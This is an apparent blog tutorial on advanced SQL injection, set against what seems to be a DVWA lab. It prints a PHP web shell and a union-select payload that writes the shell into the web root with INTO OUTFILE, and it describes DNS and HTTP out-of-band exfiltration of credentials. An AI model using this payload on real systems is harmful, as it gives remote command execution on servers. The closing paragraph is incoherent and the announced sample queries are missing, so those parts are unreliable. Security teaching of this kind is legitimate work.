In the previous blog, we understood the extreme basics of SQL Injection. But in this, we are going to look for some high-level possibilities of a SQL Injection attack.
SQL Injection is one of the most common vulnerabilities encountered on the web and can also be one of the most dangerous. Attackers can inject malicious SQL code in order to extract sensitive information, modify or destroy existing data, or escalate the sql attack in an attempt to own the server.
As by our previous blog, we observed that we have 2 columns and we found this by using ORDER BY of the SQL. Now that we have a little more information about the database, we can use this to our convenience to perform a union-based SQL injection. The union operator is used in SQL to combine the results of two or more blend statements, but in order for it to work properly, the statements have to have the same number of columns.
We can do may things with UNION-BASED INJECTIONS, but here let’s try to run some commands. Well, indeed that is possible and the best way to do so is by “Uploading a simple PHP Shell”. We need to resolve the root directory of the webserver to upload our shell. Depending on the application we can guess the type of web server used, which can alter, especially if the admin changes the default location.
For understanding purposes, let’s assume that the default webroot of Apache (/var/www/) is being used with public write permissions.
NOTE: Information about the web server, including the root directory, can usually be found in the "phpinfo.php" file.
We can use into outfile command to write to a file. We will thus insert a simple PHP script which could execute commands which will look like this:
<?php system($_GET["cmd"]); ?>
Let’s Inject; Using double quotation marks in the script as we need to enclose the second part of the statement in single quotes to avoid syntax errors, which will look like this;
Where cmd.php being the name of our shell file.
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
Thus, on this working properly we will be able to access our shell via URL and execute commands.
Out of Band technique provides an attacker with an alternative way to confirm and exploit a vulnerability that is otherwise “blind”. In a blind vulnerability, as an attacker, you do not get the output of the vulnerability in the direct response to the vulnerable request. The OOB techniques often require a vulnerable entity to generate an outbound TCP/UDP/ICMP request and that will then allow an attacker to exfiltrate data. The success of an OOB SQL attack is based on the egress firewall rules i.e. which outbound request is permitted from the vulnerable system and the perimeter firewall.
OOB SQL attack injection exfiltrates data through an outbound channel can be either DNS or HTTP protocol. The capability of a database system to initiate outbound DNS or HTTP request may need to rely on the function available. The function can be either file operation function (for instance: load_file(), master..xp_dirtree) or establish connection function (for instance: DBMS_LDAP.INIT, UTL_HTTP.request).
The following is a sample of query for DNS based exfiltration for MariaDB, one of the forks of MySQL database. The query is used to exfiltrate database version, username, and password from MariaDB. load_file() function is used to initiate outbound DNS request and period (.) as a delimiter to organize the display of captured data.
Oracle database is used to demonstrate HTTP based exfiltration by using UTL_HTTP.request function. The following shows the sample query used to exfiltrate database version, current username and hashed password from the database. The purpose of UTL_HTTP.request() function is trigger HTTP request of database system. String version, user and hash pass are used to organize the captured data and made it looks like parameters of the HTTP request.
The above usually comes in handy for the prevention of SQL injection attacks by reducing the variety of types of lines and statements that can be cleared through the parameters. although, there are various methods around the restrictions and limitations and many other intriguing lines that can be entered to store the process.